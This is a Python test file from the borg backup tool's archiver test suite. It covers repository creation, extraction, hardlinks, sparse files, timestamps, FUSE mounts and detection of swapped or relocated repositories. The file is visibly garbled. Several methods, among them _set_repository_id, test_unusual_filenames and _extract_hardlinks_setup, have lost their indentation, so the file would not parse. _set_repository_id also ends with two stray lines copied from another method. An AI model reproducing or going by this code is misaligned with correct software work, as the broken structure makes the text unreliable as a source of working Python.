            count = random.randint(1, count)
            if size > 1:
                size = random.randint(1, size)
        for i in range(count):
            fn = os.path.join(dir, "file%03d" % i)
            with open(fn, 'wb') as f:
                data = os.urandom(size)
                f.write(data)
    with environment_variable(BORG_CHECK_I_KNOW_WHAT_I_AM_DOING='YES'):
        mount = DF_MOUNT
        assert os.path.exists(mount)
        repo = os.path.join(mount, 'repo')
        input = os.path.join(mount, 'input')
        reserve = os.path.join(mount, 'reserve')
        for j in range(100):
            shutil.rmtree(repo, ignore_errors=True)
            shutil.rmtree(input, ignore_errors=True)
            # keep some space and some inodes in reserve that we can free up later:
            make_files(reserve, 80, 100000, rnd=False)
            rc, out = cmd('init', repo)
            if rc != EXIT_SUCCESS:
                print('init', rc, out)
            assert rc == EXIT_SUCCESS
            try:
                success, i = True, 0
                while success:
                    i += 1
                    try:
                        make_files(input, 20, 200000)
                    except OSError as err:
                        if err.errno == errno.ENOSPC:
                            # already out of space
                            break
                        raise
                    try:
                        rc, out = cmd('create', '%s::test%03d' % (repo, i), input)
                        success = rc == EXIT_SUCCESS
                        if not success:
                            print('create', rc, out)
                    finally:
                        # make sure repo is not locked
                        shutil.rmtree(os.path.join(repo, 'lock.exclusive'), ignore_errors=True)
                        # NOTE(review): unguarded remove — presumably lock.roster always
                        # exists after a create attempt; would raise FileNotFoundError
                        # otherwise. TODO confirm.
                        os.remove(os.path.join(repo, 'lock.roster'))
            finally:
                # now some error happened, likely we are out of disk space.
                # free some space so we can expect borg to be able to work normally:
                shutil.rmtree(reserve, ignore_errors=True)
                rc, out = cmd('list', repo)
                if rc != EXIT_SUCCESS:
                    print('list', rc, out)
                rc, out = cmd('check', '--repair', repo)
                if rc != EXIT_SUCCESS:
                    print('check', rc, out)
                assert rc == EXIT_SUCCESS
class ArchiverTestCaseBase(BaseTestCase):
    """Common fixture for archiver tests: builds a temp working tree
    (repository, input, output, keys, cache, excludes/patterns files) and
    provides helpers to run borg commands and create test files."""
    EXE = None  # python source based
    FORK_DEFAULT = False
    prefix = ''
    def setUp(self):
        # pre-answer all interactive confirmations borg might ask for
        os.environ['BORG_CHECK_I_KNOW_WHAT_I_AM_DOING'] = 'YES'
        os.environ['BORG_DELETE_I_KNOW_WHAT_I_AM_DOING'] = 'YES'
        os.environ['BORG_RECREATE_I_KNOW_WHAT_I_AM_DOING'] = 'YES'
        os.environ['BORG_PASSPHRASE'] = 'waytooeasyonlyfortests'
        # NOTE(review): old-style `and/or` conditional — equivalent to
        # `Archiver() if not self.FORK_DEFAULT else None` since Archiver() is truthy.
        self.archiver = not self.FORK_DEFAULT and Archiver() or None
        self.tmpdir = tempfile.mkdtemp()
        self.repository_path = os.path.join(self.tmpdir, 'repository')
        self.repository_location = self.prefix + self.repository_path
        self.input_path = os.path.join(self.tmpdir, 'input')
        self.output_path = os.path.join(self.tmpdir, 'output')
        self.keys_path = os.path.join(self.tmpdir, 'keys')
        self.cache_path = os.path.join(self.tmpdir, 'cache')
        self.exclude_file_path = os.path.join(self.tmpdir, 'excludes')
        self.patterns_file_path = os.path.join(self.tmpdir, 'patterns')
        os.environ['BORG_KEYS_DIR'] = self.keys_path
        os.environ['BORG_CACHE_DIR'] = self.cache_path
        os.mkdir(self.input_path)
        os.chmod(self.input_path, 0o777)  # avoid troubles with fakeroot / FUSE
        os.mkdir(self.output_path)
        os.mkdir(self.keys_path)
        os.mkdir(self.cache_path)
        with open(self.exclude_file_path, 'wb') as fd:
            fd.write(b'input/file2\n# A comment line, then a blank line\n\n')
        with open(self.patterns_file_path, 'wb') as fd:
            fd.write(b'+input/file_important\n- input/file*\n# A comment line, then a blank line\n\n')
        self._old_wd = os.getcwd()
        # tests use relative paths like 'input'/'output', so chdir into tmpdir
        os.chdir(self.tmpdir)
    def tearDown(self):
        os.chdir(self._old_wd)
        # note: ignore_errors=True as workaround for issue #862
        shutil.rmtree(self.tmpdir, ignore_errors=True)
        setup_logging()
    def cmd(self, *args, **kw):
        """Run a borg command, assert its exit code (default 0) and return
        its output with pure-python msgpack warnings filtered out."""
        exit_code = kw.pop('exit_code', 0)
        fork = kw.pop('fork', None)
        binary_output = kw.get('binary_output', False)
        if fork is None:
            fork = self.FORK_DEFAULT
        ret, output = exec_cmd(*args, fork=fork, exe=self.EXE, archiver=self.archiver, **kw)
        if ret != exit_code:
            print(output)
        self.assert_equal(ret, exit_code)
        # if tests are run with the pure-python msgpack, there will be warnings about
        # this in the output, which would make a lot of tests fail.
        pp_msg = PURE_PYTHON_MSGPACK_WARNING.encode() if binary_output else PURE_PYTHON_MSGPACK_WARNING
        empty = b'' if binary_output else ''
        output = empty.join(line for line in output.splitlines(keepends=True)
                            if pp_msg not in line)
        return output
    def create_src_archive(self, name):
        # archive the borg source tree itself as a realistic data set
        self.cmd('create', '--compression=lz4', self.repository_location + '::' + name, src_dir)
    def open_archive(self, name):
        """Open the repository and return (archive, repository) for *name*."""
        repository = Repository(self.repository_path, exclusive=True)
        with repository:
            manifest, key = Manifest.load(repository, Manifest.NO_OPERATION_CHECK)
            archive = Archive(repository, key, manifest, name)
        return archive, repository
    def open_repository(self):
        return Repository(self.repository_path, exclusive=True)
    def create_regular_file(self, name, size=0, contents=None):
        """Create input/<name>, either *size* bytes of 'X' or *contents*."""
        assert not (size != 0 and contents and len(contents) != size), 'size and contents do not match'
        filename = os.path.join(self.input_path, name)
        if not os.path.exists(os.path.dirname(filename)):
            os.makedirs(os.path.dirname(filename))
        with open(filename, 'wb') as fd:
            if contents is None:
                contents = b'X' * size
            fd.write(contents)
    def create_test_files(self):
        """Create a minimal test case including all supported file types
        """
        # File
        self.create_regular_file('file1', size=1024 * 80)
        self.create_regular_file('flagfile', size=1024)
        # Directory
        self.create_regular_file('dir2/file2', size=1024 * 80)
        # File mode
        os.chmod('input/file1', 0o4755)
        # Hard link
        if are_hardlinks_supported():
            os.link(os.path.join(self.input_path, 'file1'),
                    os.path.join(self.input_path, 'hardlink'))
        # Symlink
        if are_symlinks_supported():
            os.symlink('somewhere', os.path.join(self.input_path, 'link1'))
        self.create_regular_file('fusexattr', size=1)
        if not xattr.XATTR_FAKEROOT and xattr.is_enabled(self.input_path):
            fn = os.fsencode(os.path.join(self.input_path, 'fusexattr'))
            # ironically, due to the way how fakeroot works, comparing FUSE file xattrs to orig file xattrs
            # will FAIL if fakeroot supports xattrs, thus we only set the xattr if XATTR_FAKEROOT is False.
            # This is because fakeroot with xattr-support does not propagate xattrs of the underlying file
            # into "fakeroot space". Because the xattrs exposed by borgfs are these of an underlying file
            # (from fakeroots point of view) they are invisible to the test process inside the fakeroot.
            xattr.setxattr(fn, b'user.foo', b'bar')
            xattr.setxattr(fn, b'user.empty', b'')
            # XXX this always fails for me
            # ubuntu 14.04, on a TMP dir filesystem with user_xattr, using fakeroot
            # same for newer ubuntu and centos.
            # if this is supported just on specific platform, platform should be checked first,
            # so that the test setup for all tests using it does not fail here always for others.
            # xattr.setxattr(os.path.join(self.input_path, 'link1'), b'user.foo_symlink', b'bar_symlink', follow_symlinks=False)
        # FIFO node
        if are_fifos_supported():
            os.mkfifo(os.path.join(self.input_path, 'fifo1'))
        if has_lchflags:
            platform.set_flags(os.path.join(self.input_path, 'flagfile'), stat.UF_NODUMP)
        try:
            # Block device
            os.mknod('input/bdev', 0o600 | stat.S_IFBLK, os.makedev(10, 20))
            # Char device
            os.mknod('input/cdev', 0o600 | stat.S_IFCHR, os.makedev(30, 40))
            # File mode
            os.chmod('input/dir2', 0o555)  # if we take away write perms, we need root to remove contents
            # File owner
            os.chown('input/file1', 100, 200)  # raises OSError invalid argument on cygwin
            have_root = True  # we have (fake)root
        except PermissionError:
            have_root = False
        except OSError as e:
            # Note: ENOSYS "Function not implemented" happens as non-root on Win 10 Linux Subsystem.
            if e.errno not in (errno.EINVAL, errno.ENOSYS):
                raise
            have_root = False
        time.sleep(1)  # "empty" must have newer timestamp than other files
        self.create_regular_file('empty', size=0)
        return have_root
class ArchiverTestCase(ArchiverTestCaseBase):
    def test_basic_functionality(self):
        """End-to-end smoke test: init, create (twice), extract, list, info,
        and info again after the cache was removed — output must match."""
        have_root = self.create_test_files()
        # fork required to test show-rc output
        output = self.cmd('init', '--encryption=repokey', '--show-version', '--show-rc', self.repository_location, fork=True)
        self.assert_in('borgbackup version', output)
        self.assert_in('terminating with success status, rc 0', output)
        self.cmd('create', '--exclude-nodump', self.repository_location + '::test', 'input')
        output = self.cmd('create', '--exclude-nodump', '--stats', self.repository_location + '::test.2', 'input')
        self.assert_in('Archive name: test.2', output)
        self.assert_in('This archive: ', output)
        with changedir('output'):
            self.cmd('extract', self.repository_location + '::test')
        list_output = self.cmd('list', '--short', self.repository_location)
        self.assert_in('test', list_output)
        self.assert_in('test.2', list_output)
        expected = [
            'input',
            'input/bdev',
            'input/cdev',
            'input/dir2',
            'input/dir2/file2',
            'input/empty',
            'input/file1',
            'input/flagfile',
        ]
        if are_fifos_supported():
            expected.append('input/fifo1')
        if are_symlinks_supported():
            expected.append('input/link1')
        if are_hardlinks_supported():
            expected.append('input/hardlink')
        if not have_root:
            # we could not create these device files without (fake)root
            expected.remove('input/bdev')
            expected.remove('input/cdev')
        if has_lchflags:
            # remove the file we did not backup, so input and output become equal
            expected.remove('input/flagfile')  # this file is UF_NODUMP
            os.remove(os.path.join('input', 'flagfile'))
        list_output = self.cmd('list', '--short', self.repository_location + '::test')
        for name in expected:
            self.assert_in(name, list_output)
        self.assert_dirs_equal('input', 'output/input')
        info_output = self.cmd('info', self.repository_location + '::test')
        item_count = 4 if has_lchflags else 5 # one file is UF_NODUMP
        self.assert_in('Number of files: %d' % item_count, info_output)
        shutil.rmtree(self.cache_path)
        info_output2 = self.cmd('info', self.repository_location + '::test')
        def filter(output):
            # (shadows the builtin `filter`, but only locally)
            # filter for interesting "info" output, ignore cache rebuilding related stuff
            prefixes = ['Name:', 'Fingerprint:', 'Number of files:', 'This archive:',
                        'All archives:', 'Chunk index:', ]
            result = []
            for line in output.splitlines():
                for prefix in prefixes:
                    if line.startswith(prefix):
                        result.append(line)
            return '\n'.join(result)
        # the interesting parts of info_output2 and info_output should be same
        self.assert_equal(filter(info_output), filter(info_output2))
    def test_init_parent_dirs(self):
        """'borg init' must not create missing parent directories unless
        --make-parent-dirs is given."""
        parent_path = os.path.join(self.tmpdir, 'parent1', 'parent2')
        repository_path = os.path.join(parent_path, 'repository')
        repository_location = self.prefix + repository_path
        with pytest.raises(Repository.ParentPathDoesNotExist):
            # normal borg init does NOT create missing parent dirs
            self.cmd('init', '--encryption=none', repository_location)
        # but if told so, it does:
        self.cmd('init', '--encryption=none', '--make-parent-dirs', repository_location)
        assert os.path.exists(parent_path)
    def test_unix_socket(self):
        """A unix socket in the input dir is skipped by create and therefore
        absent after extract."""
        self.cmd('init', '--encryption=repokey', self.repository_location)
        try:
            sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
            sock.bind(os.path.join(self.input_path, 'unix-socket'))
        except PermissionError as err:
            if err.errno == errno.EPERM:
                pytest.skip('unix sockets disabled or not supported')
            elif err.errno == errno.EACCES:
                pytest.skip('permission denied to create unix sockets')
            # NOTE(review): any other errno falls through here with `sock`
            # possibly unbound — presumably never happens in practice.
        self.cmd('create', self.repository_location + '::test', 'input')
        sock.close()
        with changedir('output'):
            self.cmd('extract', self.repository_location + '::test')
            assert not os.path.exists('input/unix-socket')
    @pytest.mark.skipif(not are_symlinks_supported(), reason='symlinks not supported')
    def test_symlink_extract(self):
        """A symlink round-trips through create/extract with its target intact."""
        self.create_test_files()
        self.cmd('init', '--encryption=repokey', self.repository_location)
        self.cmd('create', self.repository_location + '::test', 'input')
        with changedir('output'):
            self.cmd('extract', self.repository_location + '::test')
            assert os.readlink('input/link1') == 'somewhere'
    @pytest.mark.skipif(not is_utime_fully_supported(), reason='cannot properly setup and execute test without utime')
    def test_atime(self):
        """With --atime, the archived atime is restored on extract; the input
        file's atime is only preserved if O_NOATIME is effective."""
        def has_noatime(some_file):
            # detect whether opening with flags_noatime really avoids
            # updating the atime (requires flags support + permission)
            atime_before = os.stat(some_file).st_atime_ns
            try:
                with open(os.open(some_file, flags_noatime)) as file:
                    file.read()
            except PermissionError:
                return False
            else:
                atime_after = os.stat(some_file).st_atime_ns
                noatime_used = flags_noatime != flags_normal
                return noatime_used and atime_before == atime_after
        self.create_test_files()
        atime, mtime = 123456780, 234567890
        have_noatime = has_noatime('input/file1')
        os.utime('input/file1', (atime, mtime))
        self.cmd('init', '--encryption=repokey', self.repository_location)
        self.cmd('create', '--atime', self.repository_location + '::test', 'input')
        with changedir('output'):
            self.cmd('extract', self.repository_location + '::test')
        sti = os.stat('input/file1')
        sto = os.stat('output/input/file1')
        assert sti.st_mtime_ns == sto.st_mtime_ns == mtime * 1e9
        if have_noatime:
            assert sti.st_atime_ns == sto.st_atime_ns == atime * 1e9
        else:
            # it touched the input file's atime while backing it up
            assert sto.st_atime_ns == atime * 1e9
    @pytest.mark.skipif(not is_utime_fully_supported(), reason='cannot properly setup and execute test without utime')
    @pytest.mark.skipif(not is_birthtime_fully_supported(), reason='cannot properly setup and execute test without birthtime')
    def test_birthtime(self):
        """Birthtime and mtime round-trip through create/extract."""
        self.create_test_files()
        birthtime, mtime, atime = 946598400, 946684800, 946771200
        # first utime sets the birthtime (earliest mtime), second the final mtime
        os.utime('input/file1', (atime, birthtime))
        os.utime('input/file1', (atime, mtime))
        self.cmd('init', '--encryption=repokey', self.repository_location)
        self.cmd('create', self.repository_location + '::test', 'input')
        with changedir('output'):
            self.cmd('extract', self.repository_location + '::test')
        sti = os.stat('input/file1')
        sto = os.stat('output/input/file1')
        assert int(sti.st_birthtime * 1e9) == int(sto.st_birthtime * 1e9) == birthtime * 1e9
        assert sti.st_mtime_ns == sto.st_mtime_ns == mtime * 1e9
    @pytest.mark.skipif(not is_utime_fully_supported(), reason='cannot properly setup and execute test without utime')
    @pytest.mark.skipif(not is_birthtime_fully_supported(), reason='cannot properly setup and execute test without birthtime')
    def test_nobirthtime(self):
        """With --nobirthtime, the extracted file's birthtime is not restored;
        it ends up equal to the (later) mtime instead."""
        self.create_test_files()
        birthtime, mtime, atime = 946598400, 946684800, 946771200
        os.utime('input/file1', (atime, birthtime))
        os.utime('input/file1', (atime, mtime))
        self.cmd('init', '--encryption=repokey', self.repository_location)
        self.cmd('create', '--nobirthtime', self.repository_location + '::test', 'input')
        with changedir('output'):
            self.cmd('extract', self.repository_location + '::test')
        sti = os.stat('input/file1')
        sto = os.stat('output/input/file1')
        assert int(sti.st_birthtime * 1e9) == birthtime * 1e9
        assert int(sto.st_birthtime * 1e9) == mtime * 1e9
        assert sti.st_mtime_ns == sto.st_mtime_ns == mtime * 1e9
def _extract_repository_id(self, path):
with Repository(self.repository_path) as repository:
return repository.id
def _set_repository_id(self, path, id):
config = ConfigParser(interpolation=None)
config.read(os.path.join(path, 'config'))
config.set('repository', 'id', bin_to_hex(id))
with open(os.path.join(path, 'config'), 'w') as fd:
config.write(fd)
with Repository(self.repository_path) as repository:
return repository.id
    def test_sparse_file(self):
        """If the OS/filesystem supports sparse files, a sparse input must
        extract (with --sparse) to a file with the same holes and contents."""
        def is_sparse(fn, total_size, hole_size):
            # heuristic: block count smaller than size, and (where available)
            # SEEK_HOLE/SEEK_DATA confirm the expected leading hole
            st = os.stat(fn)
            assert st.st_size == total_size
            sparse = True
            if sparse and hasattr(st, 'st_blocks') and st.st_blocks * 512 >= st.st_size:
                sparse = False
            if sparse and hasattr(os, 'SEEK_HOLE') and hasattr(os, 'SEEK_DATA'):
                with open(fn, 'rb') as fd:
                    # only check if the first hole is as expected, because the 2nd hole check
                    # is problematic on xfs due to its "dynamic speculative EOF preallocation
                    try:
                        if fd.seek(0, os.SEEK_HOLE) != 0:
                            sparse = False
                        if fd.seek(0, os.SEEK_DATA) != hole_size:
                            sparse = False
                    except OSError:
                        # OS/FS does not really support SEEK_HOLE/SEEK_DATA
                        sparse = False
            return sparse
        filename = os.path.join(self.input_path, 'sparse')
        content = b'foobar'
        hole_size = 5 * (1 << CHUNK_MAX_EXP)  # 5 full chunker buffers
        total_size = hole_size + len(content) + hole_size
        with open(filename, 'wb') as fd:
            # create a file that has a hole at the beginning and end (if the
            # OS and filesystem supports sparse files)
            fd.seek(hole_size, 1)
            fd.write(content)
            fd.seek(hole_size, 1)
            pos = fd.tell()
            fd.truncate(pos)
        # we first check if we could create a sparse input file:
        sparse_support = is_sparse(filename, total_size, hole_size)
        if sparse_support:
            # we could create a sparse input file, so creating a backup of it and
            # extracting it again (as sparse) should also work:
            self.cmd('init', '--encryption=repokey', self.repository_location)
            self.cmd('create', self.repository_location + '::test', 'input')
            with changedir(self.output_path):
                self.cmd('extract', '--sparse', self.repository_location + '::test')
            self.assert_dirs_equal('input', 'output/input')
            filename = os.path.join(self.output_path, 'input', 'sparse')
            with open(filename, 'rb') as fd:
                # check if file contents are as expected
                self.assert_equal(fd.read(hole_size), b'\0' * hole_size)
                self.assert_equal(fd.read(len(content)), content)
                self.assert_equal(fd.read(hole_size), b'\0' * hole_size)
            self.assert_true(is_sparse(filename, total_size, hole_size))
def test_unusual_filenames(self):
filenames = ['normal', 'with some blanks', '(with_parens)', ]
for filename in filenames:
filename = os.path.join(self.input_path, filename)
with open(filename, 'wb'):
pass
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test', 'input')
for filename in filenames:
with changedir('output'):
self.cmd('extract', self.repository_location + '::test', os.path.join('input', filename))
assert os.path.exists(os.path.join('output', 'input', filename))
    def test_repository_swap_detection(self):
        """Replacing an encrypted repo with an unencrypted one that reuses
        the same repository id must abort the next create."""
        self.create_test_files()
        os.environ['BORG_PASSPHRASE'] = 'passphrase'
        self.cmd('init', '--encryption=repokey', self.repository_location)
        repository_id = self._extract_repository_id(self.repository_path)
        self.cmd('create', self.repository_location + '::test', 'input')
        shutil.rmtree(self.repository_path)
        self.cmd('init', '--encryption=none', self.repository_location)
        self._set_repository_id(self.repository_path, repository_id)
        self.assert_equal(repository_id, self._extract_repository_id(self.repository_path))
        if self.FORK_DEFAULT:
            self.cmd('create', self.repository_location + '::test.2', 'input', exit_code=EXIT_ERROR)
        else:
            with pytest.raises(Cache.EncryptionMethodMismatch):
                self.cmd('create', self.repository_location + '::test.2', 'input')
    def test_repository_swap_detection2(self):
        """Renaming an unencrypted repo into the place of an encrypted one
        must abort the next create."""
        self.create_test_files()
        self.cmd('init', '--encryption=none', self.repository_location + '_unencrypted')
        os.environ['BORG_PASSPHRASE'] = 'passphrase'
        self.cmd('init', '--encryption=repokey', self.repository_location + '_encrypted')
        self.cmd('create', self.repository_location + '_encrypted::test', 'input')
        shutil.rmtree(self.repository_path + '_encrypted')
        os.rename(self.repository_path + '_unencrypted', self.repository_path + '_encrypted')
        if self.FORK_DEFAULT:
            self.cmd('create', self.repository_location + '_encrypted::test.2', 'input', exit_code=EXIT_ERROR)
        else:
            with pytest.raises(Cache.RepositoryAccessAborted):
                self.cmd('create', self.repository_location + '_encrypted::test.2', 'input')
    def test_repository_swap_detection_no_cache(self):
        """Like test_repository_swap_detection, but the swap must still be
        detected after the local cache was deleted."""
        self.create_test_files()
        os.environ['BORG_PASSPHRASE'] = 'passphrase'
        self.cmd('init', '--encryption=repokey', self.repository_location)
        repository_id = self._extract_repository_id(self.repository_path)
        self.cmd('create', self.repository_location + '::test', 'input')
        shutil.rmtree(self.repository_path)
        self.cmd('init', '--encryption=none', self.repository_location)
        self._set_repository_id(self.repository_path, repository_id)
        self.assert_equal(repository_id, self._extract_repository_id(self.repository_path))
        self.cmd('delete', '--cache-only', self.repository_location)
        if self.FORK_DEFAULT:
            self.cmd('create', self.repository_location + '::test.2', 'input', exit_code=EXIT_ERROR)
        else:
            with pytest.raises(Cache.EncryptionMethodMismatch):
                self.cmd('create', self.repository_location + '::test.2', 'input')
    def test_repository_swap_detection2_no_cache(self):
        """Like test_repository_swap_detection2, but with both local caches
        deleted before the swap."""
        self.create_test_files()
        self.cmd('init', '--encryption=none', self.repository_location + '_unencrypted')
        os.environ['BORG_PASSPHRASE'] = 'passphrase'
        self.cmd('init', '--encryption=repokey', self.repository_location + '_encrypted')
        self.cmd('create', self.repository_location + '_encrypted::test', 'input')
        self.cmd('delete', '--cache-only', self.repository_location + '_unencrypted')
        self.cmd('delete', '--cache-only', self.repository_location + '_encrypted')
        shutil.rmtree(self.repository_path + '_encrypted')
        os.rename(self.repository_path + '_unencrypted', self.repository_path + '_encrypted')
        if self.FORK_DEFAULT:
            self.cmd('create', self.repository_location + '_encrypted::test.2', 'input', exit_code=EXIT_ERROR)
        else:
            with pytest.raises(Cache.RepositoryAccessAborted):
                self.cmd('create', self.repository_location + '_encrypted::test.2', 'input')
    def test_repository_swap_detection_repokey_blank_passphrase(self):
        """A repokey repo whose key has a blank passphrase must be treated
        like a plaintext repo by the swap detection."""
        # Check that a repokey repo with a blank passphrase is considered like a plaintext repo.
        self.create_test_files()
        # User initializes her repository with her passphrase
        self.cmd('init', '--encryption=repokey', self.repository_location)
        self.cmd('create', self.repository_location + '::test', 'input')
        # Attacker replaces it with her own repository, which is encrypted but has no passphrase set
        shutil.rmtree(self.repository_path)
        with environment_variable(BORG_PASSPHRASE=''):
            self.cmd('init', '--encryption=repokey', self.repository_location)
        # Delete cache & security database, AKA switch to user perspective
        self.cmd('delete', '--cache-only', self.repository_location)
        repository_id = bin_to_hex(self._extract_repository_id(self.repository_path))
        shutil.rmtree(get_security_dir(repository_id))
        with environment_variable(BORG_PASSPHRASE=None):
            # This is the part were the user would be tricked, e.g. she assumes that BORG_PASSPHRASE
            # is set, while it isn't. Previously this raised no warning,
            # since the repository is, technically, encrypted.
            if self.FORK_DEFAULT:
                self.cmd('create', self.repository_location + '::test.2', 'input', exit_code=EXIT_ERROR)
            else:
                with pytest.raises(Cache.CacheInitAbortedError):
                    self.cmd('create', self.repository_location + '::test.2', 'input')
    def test_repository_move(self):
        """Accessing a relocated repository needs confirmation once; the
        security dir is then updated and later recreated on demand."""
        self.cmd('init', '--encryption=repokey', self.repository_location)
        repository_id = bin_to_hex(self._extract_repository_id(self.repository_path))
        os.rename(self.repository_path, self.repository_path + '_new')
        with environment_variable(BORG_RELOCATED_REPO_ACCESS_IS_OK='yes'):
            self.cmd('info', self.repository_location + '_new')
        security_dir = get_security_dir(repository_id)
        with open(os.path.join(security_dir, 'location')) as fd:
            location = fd.read()
            assert location == Location(self.repository_location + '_new').canonical_path()
        # Needs no confirmation anymore
        self.cmd('info', self.repository_location + '_new')
        shutil.rmtree(self.cache_path)
        self.cmd('info', self.repository_location + '_new')
        shutil.rmtree(security_dir)
        self.cmd('info', self.repository_location + '_new')
        # the info call above must have recreated the security dir contents:
        for file in ('location', 'key-type', 'manifest-timestamp'):
            assert os.path.exists(os.path.join(security_dir, file))
    def test_security_dir_compat(self):
        """An outdated 'location' entry in the security dir is tolerated as
        long as the cache still has correct information."""
        self.cmd('init', '--encryption=repokey', self.repository_location)
        repository_id = bin_to_hex(self._extract_repository_id(self.repository_path))
        security_dir = get_security_dir(repository_id)
        with open(os.path.join(security_dir, 'location'), 'w') as fd:
            fd.write('something outdated')
        # This is fine, because the cache still has the correct information. security_dir and cache can disagree
        # if older versions are used to confirm a renamed repository.
        self.cmd('info', self.repository_location)
    def test_unknown_unencrypted(self):
        """Accessing an unencrypted repo that is unknown (no cache and no
        security dir) requires explicit confirmation."""
        self.cmd('init', '--encryption=none', self.repository_location)
        repository_id = bin_to_hex(self._extract_repository_id(self.repository_path))
        security_dir = get_security_dir(repository_id)
        # Ok: repository is known
        self.cmd('info', self.repository_location)
        # Ok: repository is still known (through security_dir)
        shutil.rmtree(self.cache_path)
        self.cmd('info', self.repository_location)
        # Needs confirmation: cache and security dir both gone (eg. another host or rm -rf ~)
        # (the info call above recreated the cache, so remove it again)
        shutil.rmtree(self.cache_path)
        shutil.rmtree(security_dir)
        if self.FORK_DEFAULT:
            self.cmd('info', self.repository_location, exit_code=EXIT_ERROR)
        else:
            with pytest.raises(Cache.CacheInitAbortedError):
                self.cmd('info', self.repository_location)
        with environment_variable(BORG_UNKNOWN_UNENCRYPTED_REPO_ACCESS_IS_OK='yes'):
            self.cmd('info', self.repository_location)
    def test_strip_components(self):
        """--strip-components removes the given number of leading path
        components on extract; stripping everything extracts nothing."""
        self.cmd('init', '--encryption=repokey', self.repository_location)
        self.create_regular_file('dir/file')
        self.cmd('create', self.repository_location + '::test', 'input')
        with changedir('output'):
            # 'input/dir/file' has 3 components, so stripping 3 leaves nothing
            self.cmd('extract', self.repository_location + '::test', '--strip-components', '3')
            self.assert_true(not os.path.exists('file'))
            with self.assert_creates_file('file'):
                self.cmd('extract', self.repository_location + '::test', '--strip-components', '2')
            with self.assert_creates_file('dir/file'):
                self.cmd('extract', self.repository_location + '::test', '--strip-components', '1')
            with self.assert_creates_file('input/dir/file'):
                self.cmd('extract', self.repository_location + '::test', '--strip-components', '0')
def _extract_hardlinks_setup(self):
os.mkdir(os.path.join(self.input_path, 'dir1'))
os.mkdir(os.path.join(self.input_path, 'dir1/subdir'))
self.create_regular_file('source', contents=b'123456')
os.link(os.path.join(self.input_path, 'source'),
os.path.join(self.input_path, 'abba'))
os.link(os.path.join(self.input_path, 'source'),
os.path.join(self.input_path, 'dir1/hardlink'))
os.link(os.path.join(self.input_path, 'source'),
os.path.join(self.input_path, 'dir1/subdir/hardlink'))
self.create_regular_file('dir1/source2')
os.link(os.path.join(self.input_path, 'dir1/source2'),
os.path.join(self.input_path, 'dir1/aaaa'))
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test', 'input')
requires_hardlinks = pytest.mark.skipif(not are_hardlinks_supported(), reason='hardlinks not supported')
    @requires_hardlinks
    @unittest.skipUnless(has_llfuse, 'llfuse not installed')
    def test_fuse_mount_hardlinks(self):
        """Hardlink counts and contents must be correct in a FUSE mount,
        with and without --strip-components / subtree selection."""
        self._extract_hardlinks_setup()
        mountpoint = os.path.join(self.tmpdir, 'mountpoint')
        # we need to get rid of permissions checking because fakeroot causes issues with it.
        # On all platforms, borg defaults to "default_permissions" and we need to get rid of it via "ignore_permissions".
        # On macOS (darwin), we additionally need "defer_permissions" to switch off the checks in osxfuse.
        if sys.platform == 'darwin':
            ignore_perms = ['-o', 'ignore_permissions,defer_permissions']
        else:
            ignore_perms = ['-o', 'ignore_permissions']
        with self.fuse_mount(self.repository_location + '::test', mountpoint, '--strip-components=2', *ignore_perms), \
                changedir(mountpoint):
            assert os.stat('hardlink').st_nlink == 2
            assert os.stat('subdir/hardlink').st_nlink == 2
            assert open('subdir/hardlink', 'rb').read() == b'123456'
            assert os.stat('aaaa').st_nlink == 2
            assert os.stat('source2').st_nlink == 2
        with self.fuse_mount(self.repository_location + '::test', mountpoint, 'input/dir1', *ignore_perms), \
                changedir(mountpoint):
            assert os.stat('input/dir1/hardlink').st_nlink == 2
            assert os.stat('input/dir1/subdir/hardlink').st_nlink == 2
            assert open('input/dir1/subdir/hardlink', 'rb').read() == b'123456'
            assert os.stat('input/dir1/aaaa').st_nlink == 2
            assert os.stat('input/dir1/source2').st_nlink == 2
        with self.fuse_mount(self.repository_location + '::test', mountpoint, *ignore_perms), \
                changedir(mountpoint):
            assert os.stat('input/source').st_nlink == 4
            assert os.stat('input/abba').st_nlink == 4
            assert os.stat('input/dir1/hardlink').st_nlink == 4
            assert os.stat('input/dir1/subdir/hardlink').st_nlink == 4
            assert open('input/dir1/subdir/hardlink', 'rb').read() == b'123456'
    @requires_hardlinks
    def test_extract_hardlinks1(self):
        """A full extract restores complete hardlink groups (nlink 4)."""
        self._extract_hardlinks_setup()
        with changedir('output'):
            self.cmd('extract', self.repository_location + '::test')
            assert os.stat('input/source').st_nlink == 4
            assert os.stat('input/abba').st_nlink == 4
            assert os.stat('input/dir1/hardlink').st_nlink == 4
            assert os.stat('input/dir1/subdir/hardlink').st_nlink == 4
            assert open('input/dir1/subdir/hardlink', 'rb').read() == b'123456'
    @requires_hardlinks
    def test_extract_hardlinks2(self):
        """A partial extract (strip-components or subtree) restores only the
        hardlinks inside the selection, so nlink drops to 2."""
        self._extract_hardlinks_setup()
        with changedir('output'):
            self.cmd('extract', self.repository_location + '::test', '--strip-components', '2')
            assert os.stat('hardlink').st_nlink == 2
            assert os.stat('subdir/hardlink').st_nlink == 2
            assert open('subdir/hardlink', 'rb').read() == b'123456'
            assert os.stat('aaaa').st_nlink == 2
            assert os.stat('source2').st_nlink == 2
        with changedir('output'):
            self.cmd('extract', self.repository_location + '::test', 'input/dir1')
            assert os.stat('input/dir1/hardlink').st_nlink == 2
            assert os.stat('input/dir1/subdir/hardlink').st_nlink == 2
            assert open('input/dir1/subdir/hardlink', 'rb').read() == b'123456'
            assert os.stat('input/dir1/aaaa').st_nlink == 2
            assert os.stat('input/dir1/source2').st_nlink == 2
    def test_extract_include_exclude(self):
        """Extract honors positional include patterns, --exclude, and
        --exclude-from (file4 was already excluded at create time)."""
        self.cmd('init', '--encryption=repokey', self.repository_location)
        self.create_regular_file('file1', size=1024 * 80)
        self.create_regular_file('file2', size=1024 * 80)
        self.create_regular_file('file3', size=1024 * 80)
        self.create_regular_file('file4', size=1024 * 80)
        self.cmd('create', '--exclude=input/file4', self.repository_location + '::test', 'input')
        with changedir('output'):
            self.cmd('extract', self.repository_location + '::test', 'input/file1', )
        self.assert_equal(sorted(os.listdir('output/input')), ['file1'])
        with changedir('output'):
            self.cmd('extract', '--exclude=input/file2', self.repository_location + '::test')
        self.assert_equal(sorted(os.listdir('output/input')), ['file1', 'file3'])
        with changedir('output'):
            self.cmd('extract', '--exclude-from=' + self.exclude_file_path, self.repository_location + '::test')
